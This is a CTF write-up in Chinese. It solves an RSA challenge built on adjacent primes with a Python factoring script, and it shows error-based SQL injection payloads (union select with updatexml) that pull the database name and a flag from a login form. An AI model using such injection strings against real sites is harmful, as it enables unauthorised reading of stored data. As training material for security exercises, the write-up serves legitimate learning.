0x01 RES*3
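# Challenge source as published. Line breaks are restored from a collapsed
# listing, and the statements after the bare '#' are treated as live code
# because the write-up relies on them.
# The imports were not part of the listing: getPrime / bytes_to_long are
# presumably from Crypto.Util.number and next_prime from gmpy2 -- TODO confirm.
flag = b'xxx'  # placeholder value in the published source
e = 0x10001  # public exponent (65537)
#
p = getPrime(1024)
# Key-generation weakness: q is the prime immediately after p, so both
# factors sit right next to sqrt(p*q) and the modulus can be factored from
# its integer square root. Sound RSA key generation draws p and q
# independently at random.
q = next_prime(p)
n = p*q*3  # the published n carries an extra factor 3
m = bytes_to_long(flag)
# Textbook RSA (no padding). The modulus actually used is n//3 == p*q;
# the floor division is exact because n is built as p*q*3.
c = pow(m , e, n//3)
# c=···
# n=···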
这是加密源码 rsa密钥格式: 公钥(e,n) 私钥(d,n)
已知:
- q 是 p 的下一个质数
- n 为两个质数 p、q(互素)的乘积,是公钥和私钥的公共部分
- 公钥 e:先对 p、q 求欧拉函数 t=(p-1)*(q-1),e 需满足:
  - 1<e<(p-1)*(q-1)=t
  - 质数
  - 非 t 的因子(保证 e 与 t 互素)
- 密文 c
- 函数功能: pow(a,b,c) ~ (a**b)%c
- 选取两个互素的数(q,p)
- p*q=n/3,即 pow 的第 3 个参数(当 a*3=n 时,n//3=n/3)
加密流程 对flag(大数)取公钥e的幂再取n/3的模 => c = pow(m , e, n//3)
因为已知条件的第 1 点(q 是 p 的下一个质数,两者非常接近),n/3 的平方根必然落在 p 和 q 之间,所以我们可以轻易地把 n/3 分解出 q 和 p,然后再结合公钥 e、密文 c 求出私钥 d 并解密
然后套脚本
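#python3
from gmpy2 import invert,iroot,next_prime,is_square,is_prime
from Crypto.Util.number import long_to_bytes


def C2(p,q,e,c):
    """Decrypt textbook RSA once both prime factors are known and print the result.

    Args:
        p, q: the two prime factors of the modulus.
        e: public exponent.
        c: ciphertext as an integer.

    Raises:
        ZeroDivisionError: from gmpy2.invert when e has no inverse
            modulo (p - 1) * (q - 1).
    """
    n = q * p
    # Private exponent d = e^-1 mod phi(n), with phi(n) = (p-1)*(q-1).
    d = invert(e, (p - 1) * (q - 1))
    m = pow(c,d,n)  # plaintext = (c**d) % n
    print(f'密钥d= {d}\n明文m= {m}\n= {long_to_bytes(m)}')


def pow(c, d, n):  # same result as the everyday form (c**d) % n
    """Modular exponentiation by square-and-multiply.

    NOTE: this intentionally shadows the builtin ``pow`` for the rest of the
    module, so every call in this file must pass all three arguments.
    ``d`` is expected to be non-negative; for d <= 0 the loop is skipped and
    ``1 % n`` is returned.
    """
    result = 1 % n  # 1 % n so that a modulus of 1 yields 0
    c = c % n
    while d > 0:
        if d % 2 == 1:  # current low bit of the exponent is set
            result = (result * c) % n
        d = d >> 1
        c = (c * c) % n
    return result


class Find_two_primes:
    """Three ways to split n = p*q into its two prime factors."""

    @staticmethod
    def ori(n):
        """Trial division; only practical for very small n.

        Returns (i, n // i) for the smaller prime factor i, or None when n
        is not a product of two primes.
        """
        if n < 4:
            return None
        # The smaller factor of a semiprime never exceeds sqrt(n), so there
        # is no need to scan up to n // 2.
        limit = int(iroot(n, 2)[0])
        for i in range(2, limit + 1):
            if n % i == 0 and is_prime(i) and is_prime(n // i):
                return i, n // i  # found the two primes
        return None

    @staticmethod
    def pri(n):  # preferred method
        """Factor n when it is the product of two *adjacent* primes.

        "Adjacent" means there is no other prime between them, e.g. p=3 and
        q=next_prime(p)=5. floor(sqrt(n)) then lies between the two factors,
        so the next prime above it is the larger factor. This is exactly why
        choosing q = next_prime(p) makes an RSA modulus worthless: real key
        generation must pick p and q independently at random.

        Returns:
            (larger_prime, smaller_prime)

        Raises:
            ValueError: if the candidate does not divide n, i.e. n does not
                have the assumed form.
        """
        # iroot(x, k) takes the integer k-th root of a big number and returns
        # (root, is_exact); for example iroot(8, 3) == (2, True).
        temp = iroot(n, 2)[0]
        p = next_prime(temp)
        if n % p != 0:
            raise ValueError('n is not the product of two adjacent primes')
        return p, n // p

    @staticmethod
    def las(n):  # fallback
        """Fermat's difference-of-squares search: n = a*a - b*b = (a+b)*(a-b).

        Intended for odd n; it finishes quickly only when the two factors
        are close together. For a prime n it ends with (n, 1).
        """
        a, exact = iroot(n, 2)
        if not exact:
            a += 1  # start at ceil(sqrt(n)) so that a*a - n is never negative
        while True:
            # Plain multiplication: the module-level pow() needs a modulus.
            B2 = a * a - n
            if is_square(B2):
                b = iroot(B2, 2)[0]
                return a+b, a-b
            a += 1


class Big_int_Div:
    """Hand-written floor division for a non-negative dividend and positive divisor.

    Both methods return the same value as ``big_integer // n``.
    """

    @staticmethod
    def v1(big_integer,n):
        """Division by repeated subtraction.

        Takes one loop iteration per unit of the quotient, so it is only
        usable when the quotient is small.
        """
        if n <= 0:
            raise ValueError('divisor must be positive')
        result = 0
        while big_integer >= n:
            big_integer -= n
            result += 1
        return result

    @staticmethod
    def v2(big_integer, n):
        """Shift-and-subtract division, fast enough for very large integers."""
        if n <= 0:
            raise ValueError('divisor must be positive')
        result = 0
        while big_integer >= n:
            # Find the largest shift with (n << shift) <= big_integer.
            shift = 0
            while big_integer >= (n << shift):
                shift += 1
            shift -= 1
            subtract_value = n << shift
            result += 1 << shift
            big_integer -= subtract_value
        return result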
- n=n/3
- q,p=分解n
- 解密函数(p,q,e,c)
# ···
def main():
    """Recover the flag from the published n, e and c.

    Steps: divide the factor 3 out of n, factor the remaining p*q with the
    adjacent-primes method, then hand p, q, e and c to C2, which prints the
    private exponent and the plaintext.
    """
    # Values given by the challenge.
    e = 0x10001
    n = 48631461114504503213933048503236631533108340381677563261416131764658798634145883506203948744902487835274001561646896513476389080691870633589596240502747958833769040450560137103097820329536792734430618544696183744330640322513642884524728049974270249753729085459403038574272231768464838017621829072648029807829095343724559240032690561313806010603606220226714941054497016911813749574102838793091541121640667581981661315152119641131315431472431865815936345789998105577855981463908914332966444762997193930994154180446298739894980388777485003296091460844322677788383641440700742948260816970842749014086241622298755623639397
    c = 15610381842734402431720343151826628531590822170873607546255021731309786187174986256688016153266596244825648019184784412881437108994627156029510560778331435777505796991022243495209454544720846975689290327454048500687196256648449010010966539798671100193800707101606911948736138293851168052487163502836832441394970590930617478469167562843650297355987752517460703563226259207743330949709693581492700790922368978463309899994408526223486195108719647298439243184344162210231016213340341385576796861623571842183930617482532017200517037600184736532750337445679952241192297520774169278803591905366512003079320198165950526741789

    # The real modulus is n // 3 (the encryption used pow(m, e, n//3)).
    pq = Big_int_Div.v2(n, 3)
    p, q = Find_two_primes.pri(pq)
    print(f'p= {p}\nq= {q}')
    print(e)  # 65537

    C2(p, q, e, c)


if __name__ == '__main__':
    main()
flag{2d08613c-5a4d-a0f1-b0fd-c195026c87b7}
0X02 ROTOTS
0X03老生常谈的注入
进入界面,进行传值抓包
发现是POST传值
开始推测注入点
uname=admin'&passwd=123456
没有截图。这里先用单引号让 SQL 语句报错,报错信息中回显了 and ('passwd=123456') ...,由此发现闭合方式是 ('')
开始构建 payload(比赛的时候没有截图)
uname=admin') union select 1,updatexml(1,concat(0x7e,(group_concat(database()) )),1),d--+ &passwd=123456
//爆出数据库
uname=admin') union select 1,updatexml(1,concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)),2),d--+ &passwd=123456
//中间的爆表、爆数据列就不写了;这句爆 flag,发现没全出来(updatexml 的报错信息最多只回显 32 个字符),要进行截断读取
flag{lIk1wywjS4uo48BqrhcKLUhKTb
uname=admin') union select 1,updatexml(1,substr(concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)), 10),d--+ &passwd=123456
//截断输出
wywjS4uo48BqrhcKLUhKTboPFYJR}
拼接后 flag{lIk1wywjS4uo48BqrhcKLUhKTboPFYJR}
这类报错注入之所以成立,是因为后端把 POST 参数直接拼接进 SQL,并把数据库报错原样回显给用户;修复方式是改用参数化查询(预编译语句),并关闭对用户的详细报错输出。
0x04梦回还
发现是一个图片
放入Stegsolve
发现7z压缩包文件头,保存出来
flag{2cf1cf10-ab68-67a0-bf27-226c0b839a66}